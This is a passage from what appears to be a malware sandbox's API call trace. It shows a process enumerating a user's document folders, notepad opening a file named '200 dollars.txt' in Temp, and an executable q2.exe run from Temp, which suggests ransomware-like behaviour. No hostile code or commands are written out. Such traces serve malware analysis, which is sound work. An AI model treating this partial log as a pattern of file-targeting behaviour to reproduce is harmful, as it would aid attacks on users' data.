lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\J5_j1zUimxGe_9\\*.txt", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0067.799] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\J5_j1zUimxGe_9\\foWZPFNPU\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdcc49640, ftCreationTime.dwHighDateTime=0x1d5c92d, ftLastAccessTime.dwLowDateTime=0x4f01a310, ftLastAccessTime.dwHighDateTime=0x1d5c7d0, ftLastWriteTime.dwLowDateTime=0x4f01a310, ftLastWriteTime.dwHighDateTime=0x1d5c7d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bea20 [0067.799] FindNextFileW (in: hFindFile=0x9bea20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdcc49640, ftCreationTime.dwHighDateTime=0x1d5c92d, ftLastAccessTime.dwLowDateTime=0x4f01a310, ftLastAccessTime.dwHighDateTime=0x1d5c7d0, ftLastWriteTime.dwLowDateTime=0x4f01a310, ftLastWriteTime.dwHighDateTime=0x1d5c7d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.799] FindNextFileW (in: hFindFile=0x9bea20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa019ab0, ftCreationTime.dwHighDateTime=0x1d5ca1c, ftLastAccessTime.dwLowDateTime=0x3b62d9a0, ftLastAccessTime.dwHighDateTime=0x1d5cc58, ftLastWriteTime.dwLowDateTime=0x3b62d9a0, ftLastWriteTime.dwHighDateTime=0x1d5cc58, nFileSizeHigh=0x0, nFileSizeLow=0x915e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5-GBuduJw3FT.doc", cAlternateFileName="5-GBUD~1.DOC")) returned 1 [0067.799] FindNextFileW (in: hFindFile=0x9bea20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa019ab0, ftCreationTime.dwHighDateTime=0x1d5ca1c, ftLastAccessTime.dwLowDateTime=0x3b62d9a0, ftLastAccessTime.dwHighDateTime=0x1d5cc58, ftLastWriteTime.dwLowDateTime=0x3b62d9a0, ftLastWriteTime.dwHighDateTime=0x1d5cc58, nFileSizeHigh=0x0, nFileSizeLow=0x915e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5-GBuduJw3FT.doc", cAlternateFileName="5-GBUD~1.DOC")) returned 0 [0067.799] FindClose (in: hFindFile=0x9bea20 | out: hFindFile=0x9bea20) returned 1 [0067.799] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\J5_j1zUimxGe_9\\foWZPFNPU\\*.txt", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0067.799] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\J5_j1zUimxGe_9\\N3USsHs\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a498220, ftCreationTime.dwHighDateTime=0x1d5ca7c, ftLastAccessTime.dwLowDateTime=0x3f384440, ftLastAccessTime.dwHighDateTime=0x1d5d13d, ftLastWriteTime.dwLowDateTime=0x3f384440, ftLastWriteTime.dwHighDateTime=0x1d5d13d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf260 [0067.800] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a498220, ftCreationTime.dwHighDateTime=0x1d5ca7c, ftLastAccessTime.dwLowDateTime=0x3f384440, ftLastAccessTime.dwHighDateTime=0x1d5d13d, ftLastWriteTime.dwLowDateTime=0x3f384440, ftLastWriteTime.dwHighDateTime=0x1d5d13d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.800] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17e9af80, ftCreationTime.dwHighDateTime=0x1d5cba9, ftLastAccessTime.dwLowDateTime=0x51d163b0, ftLastAccessTime.dwHighDateTime=0x1d5cc98, ftLastWriteTime.dwLowDateTime=0x51d163b0, ftLastWriteTime.dwHighDateTime=0x1d5cc98, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DP6y5GTinv", cAlternateFileName="DP6Y5G~1")) returned 1 [0067.800] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ea16d30, ftCreationTime.dwHighDateTime=0x1d5d6e2, ftLastAccessTime.dwLowDateTime=0x57390190, ftLastAccessTime.dwHighDateTime=0x1d5d563, ftLastWriteTime.dwLowDateTime=0x57390190, ftLastWriteTime.dwHighDateTime=0x1d5d563, nFileSizeHigh=0x0, nFileSizeLow=0x119e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="GBd89VX2jo.ppt", cAlternateFileName="GBD89V~1.PPT")) returned 1 [0067.800] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca976d0, ftCreationTime.dwHighDateTime=0x1d5cd30, ftLastAccessTime.dwLowDateTime=0xc2c91940, ftLastAccessTime.dwHighDateTime=0x1d5cb7c, ftLastWriteTime.dwLowDateTime=0xc2c91940, ftLastWriteTime.dwHighDateTime=0x1d5cb7c, nFileSizeHigh=0x0, nFileSizeLow=0x14aa3, dwReserved0=0x0, dwReserved1=0x0, cFileName="IGlEVDc2yO yqI.ots", cAlternateFileName="IGLEVD~1.OTS")) returned 1 [0067.800] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd6da200, ftCreationTime.dwHighDateTime=0x1d5d43f, ftLastAccessTime.dwLowDateTime=0xca45d080, ftLastAccessTime.dwHighDateTime=0x1d5cafc, ftLastWriteTime.dwLowDateTime=0xca45d080, ftLastWriteTime.dwHighDateTime=0x1d5cafc, nFileSizeHigh=0x0, nFileSizeLow=0x2889, dwReserved0=0x0, dwReserved1=0x0, cFileName="t5DLPdqz2r1 -7A.ots", cAlternateFileName="T5DLPD~1.OTS")) returned 1 [0067.800] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd6da200, ftCreationTime.dwHighDateTime=0x1d5d43f, ftLastAccessTime.dwLowDateTime=0xca45d080, ftLastAccessTime.dwHighDateTime=0x1d5cafc, ftLastWriteTime.dwLowDateTime=0xca45d080, ftLastWriteTime.dwHighDateTime=0x1d5cafc, nFileSizeHigh=0x0, nFileSizeLow=0x2889, dwReserved0=0x0, dwReserved1=0x0, cFileName="t5DLPdqz2r1 -7A.ots", cAlternateFileName="T5DLPD~1.OTS")) returned 0 [0067.800] FindClose (in: hFindFile=0x9bf260 | out: hFindFile=0x9bf260) returned 1 [0067.800] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\J5_j1zUimxGe_9\\N3USsHs\\*.txt", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0067.800] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\J5_j1zUimxGe_9\\N3USsHs\\DP6y5GTinv\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17e9af80, ftCreationTime.dwHighDateTime=0x1d5cba9, ftLastAccessTime.dwLowDateTime=0x51d163b0, ftLastAccessTime.dwHighDateTime=0x1d5cc98, ftLastWriteTime.dwLowDateTime=0x51d163b0, ftLastWriteTime.dwHighDateTime=0x1d5cc98, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be600 [0067.800] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17e9af80, ftCreationTime.dwHighDateTime=0x1d5cba9, ftLastAccessTime.dwLowDateTime=0x51d163b0, ftLastAccessTime.dwHighDateTime=0x1d5cc98, ftLastWriteTime.dwLowDateTime=0x51d163b0, ftLastWriteTime.dwHighDateTime=0x1d5cc98, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.800] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e97120, ftCreationTime.dwHighDateTime=0x1d5d1cb, ftLastAccessTime.dwLowDateTime=0xcfcc6f70, ftLastAccessTime.dwHighDateTime=0x1d5d3c4, ftLastWriteTime.dwLowDateTime=0xcfcc6f70, ftLastWriteTime.dwHighDateTime=0x1d5d3c4, nFileSizeHigh=0x0, nFileSizeLow=0xe580, dwReserved0=0x0, dwReserved1=0x0, cFileName="iItnE4gthA.csv", cAlternateFileName="IITNE4~1.CSV")) returned 1 [0067.800] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x562beaf0, ftCreationTime.dwHighDateTime=0x1d5d43d, ftLastAccessTime.dwLowDateTime=0xc6bd7b70, ftLastAccessTime.dwHighDateTime=0x1d5c83b, ftLastWriteTime.dwLowDateTime=0xc6bd7b70, ftLastWriteTime.dwHighDateTime=0x1d5c83b, nFileSizeHigh=0x0, nFileSizeLow=0x1839c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PG-2Bsg.odp", cAlternateFileName="")) returned 1 [0067.800] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa638b3b0, ftCreationTime.dwHighDateTime=0x1d5ca61, ftLastAccessTime.dwLowDateTime=0x9ae37ad0, ftLastAccessTime.dwHighDateTime=0x1d5cf8f, ftLastWriteTime.dwLowDateTime=0x9ae37ad0, ftLastWriteTime.dwHighDateTime=0x1d5cf8f, nFileSizeHigh=0x0, nFileSizeLow=0x3373, dwReserved0=0x0, dwReserved1=0x0, cFileName="r63SKjunESl--AKLK1zB.odp", cAlternateFileName="R63SKJ~1.ODP")) returned 1 [0067.800] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa638b3b0, ftCreationTime.dwHighDateTime=0x1d5ca61, ftLastAccessTime.dwLowDateTime=0x9ae37ad0, ftLastAccessTime.dwHighDateTime=0x1d5cf8f, ftLastWriteTime.dwLowDateTime=0x9ae37ad0, ftLastWriteTime.dwHighDateTime=0x1d5cf8f, nFileSizeHigh=0x0, nFileSizeLow=0x3373, dwReserved0=0x0, dwReserved1=0x0, cFileName="r63SKjunESl--AKLK1zB.odp", cAlternateFileName="R63SKJ~1.ODP")) returned 0 [0067.801] FindClose (in: hFindFile=0x9be600 | out: hFindFile=0x9be600) returned 1 [0067.801] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\J5_j1zUimxGe_9\\N3USsHs\\DP6y5GTinv\\*.txt", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0067.801] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Music\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0067.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea20) returned 1 [0067.881] EtwEventRegister (in: ProviderId=0x25ba098, EnableCallback=0x246086c, CallbackContext=0x0, RegHandle=0x25ba078 | out: RegHandle=0x25ba078) returned 0x0 [0067.884] EtwEventSetInformation (RegHandle=0x4b0000009bba60, InformationClass=0x2, EventInformation=0x25b9f78, InformationLength=0x33) returned 0x0 [0097.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fb360) returned 1 Thread: id = 36 os_tid = 0x78c Thread: id = 37 os_tid = 0xa4c Thread: id = 38 os_tid = 0x730 [0060.986] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0060.986] RoInitialize () returned 0x1 [0060.986] RoUninitialize () returned 0x0 Thread: id = 64 os_tid = 0xd84 Thread: id = 65 os_tid = 0xd94 Process: id = "5" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x166b5000" os_pid = "0x830" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x69c" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 28 os_tid = 0xe7c Thread: id = 30 os_tid = 0x168 Thread: id = 33 os_tid = 0xe9c Thread: id = 34 os_tid = 0xf7c Thread: id = 35 os_tid = 0xf5c Thread: id = 62 os_tid = 0xd80 Thread: id = 63 os_tid = 0xd74 Process: id = "6" image_name = "notepad.exe" filename = "c:\\windows\\system32\\notepad.exe" page_root = "0x60e0b000" os_pid = "0x1314" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x19c" cmd_line = "\"C:\\WINDOWS\\system32\\NOTEPAD.EXE\" C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 49 os_tid = 0x12f8 Thread: id = 50 os_tid = 0x12e8 Thread: id = 51 os_tid = 0x1300 Thread: id = 52 os_tid = 0x1304 Thread: id = 53 os_tid = 0x13a8 Process: id = "7" image_name = "q2.exe" filename = "c:\\users\\fd1hvy\\appdata\\local\\temp\\q2.exe" page_root = "0x7690000" os_pid = "0x130c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x69c" cmd_line = "\"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Process: id = "8" image_name = "werfault.exe" filename = "c:\\windows\\system32\\werfault.exe" page_root = "0x1255e000" os_pid = "0x1290" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x69c" cmd_line = "C:\\WINDOWS\\system32\\WerFault.exe -u -p 1692 -s 916" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 54 os_tid = 0xe88 [0078.319] GetProcessHeap () returned 0x22b349a0000 [0078.321] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffc37f90000 [0078.322] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="FlsAlloc") returned 0x7ffc37fae1a0 [0078.322] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="FlsFree") returned 0x7ffc37fae4e0 [0078.322] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="FlsGetValue") returned 0x7ffc37fa4710 [0078.322] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="FlsSetValue") returned 0x7ffc37fabcd0 [0078.322] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc37fb1fb0 [0078.322] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="CreateEventExW") returned 0x7ffc37fb1f10 [0078.323] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="CreateSemaphoreExW") returned 0x7ffc37fb1f70 [0078.323] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="SetThreadStackGuarantee") returned 0x7ffc37fae1e0 [0078.323] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="CreateThreadpoolTimer") returned 0x7ffc37fab200 [0078.324] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="SetThreadpoolTimer") returned 0x7ffc38aa3770 [0078.324] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7ffc38aa0f10 [0078.324] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="CloseThreadpoolTimer") returned 0x7ffc38aa09e0 [0078.324] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="CreateThreadpoolWait") returned 0x7ffc37fae6e0 [0078.324] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="SetThreadpoolWait") returned 0x7ffc38aa0ff0 [0078.324] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="CloseThreadpoolWait") returned 0x7ffc38aa08e0 [0078.324] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="FlushProcessWriteBuffers") returned 0x7ffc38b06fa0 [0078.324] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7ffc38ae51c0 [0078.324] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetCurrentProcessorNumber") returned 0x7ffc38b099c0 [0078.324] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetLogicalProcessorInformation") returned 0x7ffc37fae2c0 [0078.325] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="CreateSymbolicLinkW") returned 0x7ffc37fc6b80 [0078.325] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="SetDefaultDllDirectories") returned 0x7ffc35de8b70 [0078.325] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="EnumSystemLocalesEx") returned 0x7ffc37fc6d50 [0078.325] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="CompareStringEx") returned 0x7ffc37fa8f30 [0078.325] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetDateFormatEx") returned 0x7ffc37fc6e90 [0078.325] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetLocaleInfoEx") returned 0x7ffc37fac1d0 [0078.325] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetTimeFormatEx") returned 0x7ffc37fc70a0 [0078.325] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetUserDefaultLocaleName") returned 0x7ffc37fae3b0 [0078.325] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="IsValidLocaleName") returned 0x7ffc37fc71d0 [0078.325] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="LCMapStringEx") returned 0x7ffc37fa62d0 [0078.325] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetCurrentPackageId") returned 0x7ffc35d7f2e0 [0078.326] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetTickCount64") returned 0x7ffc37fa5eb0 [0078.326] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0078.326] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0078.327] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x478) returned 0x22b349c16d0 [0078.328] GetCurrentThreadId () returned 0xe88 [0078.328] GetCommandLineA () returned="C:\\WINDOWS\\system32\\WerFault.exe -u -p 1692 -s 916" [0078.328] GetEnvironmentStringsW () returned 0x22b349c2ed0* [0078.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1409, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1409 [0078.328] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x581) returned 0x22b349be490 [0078.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1409, lpMultiByteStr=0x22b349be490, cbMultiByte=1409, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1409 [0078.328] FreeEnvironmentStringsW (penv=0x22b349c2ed0) returned 1 [0078.328] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x28) returned 0x22b349bcf30 [0078.328] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0xb00) returned 0x22b349c2ed0 [0078.328] GetStartupInfoW (in: lpStartupInfo=0x4c1ec786d0 | out: lpStartupInfo=0x4c1ec786d0*(cb=0x68, lpReserved="", lpDesktop="", lpTitle="C:\\WINDOWS\\system32\\WerFault.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x22b349c2ed0, hStdOutput=0x7ffc19c856d0, hStdError=0x22b349be490)) [0078.328] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0078.328] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0078.328] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0078.328] GetLastError () returned 0x7f [0078.328] SetLastError (dwErrCode=0x7f) [0078.328] GetLastError () returned 0x7f [0078.328] SetLastError (dwErrCode=0x7f) [0078.329] GetLastError () returned 0x7f [0078.329] SetLastError (dwErrCode=0x7f) [0078.329] GetACP () returned 0x4e4 [0078.329] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x228) returned 0x22b349bbcb0 [0078.329] GetLastError () returned 0x7f [0078.329] SetLastError (dwErrCode=0x7f) [0078.329] IsValidCodePage (CodePage=0x4e4) returned 1 [0078.329] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x4c1ec78660 | out: lpCPInfo=0x4c1ec78660) returned 1 [0078.329] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x4c1ec78100 | out: lpCPInfo=0x4c1ec78100) returned 1 [0078.329] GetLastError () returned 0x7f [0078.329] SetLastError (dwErrCode=0x7f) [0078.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4c1ec78120, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4c1ec78120, cbMultiByte=256, lpWideCharStr=0x4c1ec77e00, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ岞蔹") returned 256 [0078.329] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 